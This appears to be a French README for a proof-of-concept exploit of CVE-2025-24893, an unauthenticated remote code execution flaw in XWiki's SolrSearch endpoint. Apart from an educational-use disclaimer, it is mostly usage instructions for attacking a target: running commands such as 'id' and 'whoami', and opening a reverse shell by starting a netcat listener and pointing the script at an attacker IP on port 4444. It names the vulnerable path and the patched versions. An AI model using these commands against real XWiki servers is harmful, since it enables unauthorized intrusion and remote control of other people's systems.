
PoC de RCE non authentifiée pour XWiki SolrSearch (CVE-2025-24893). Exécution de commandes + reverse shell.
PoC RCE sans authentification pour XWiki SolrSearch (CVE-2025-24893). Exécution de commandes + reverse shell.
Preuve de concept pour l'injection de template XWiki SolrSearch menant à une exécution de code à distance sans authentification.
Testé contre XWiki Debian 15.10.8 (corrigé dans 15.10.11 / 16.4.1 / 16.5.0RC1).
⚠️ Usage éducatif uniquement. Ne lancez pas ceci contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas explicitement l'autorisation de tester.
/xwiki/bin/get/Main/SolrSearch.pip install requests
Spécifiez l'hôte cible (et le chemin optionnel) lors de l'exécution du script.
Exécutez des commandes de base :
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"
Démarrez un reverse shell :
# Sur la machine de l'attaquant
nc -lvnp 4444
# Depuis le PoC
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <attacker_ip> 4444
/xwiki/bin/get/Main/SolrSearch?media=rss&text=...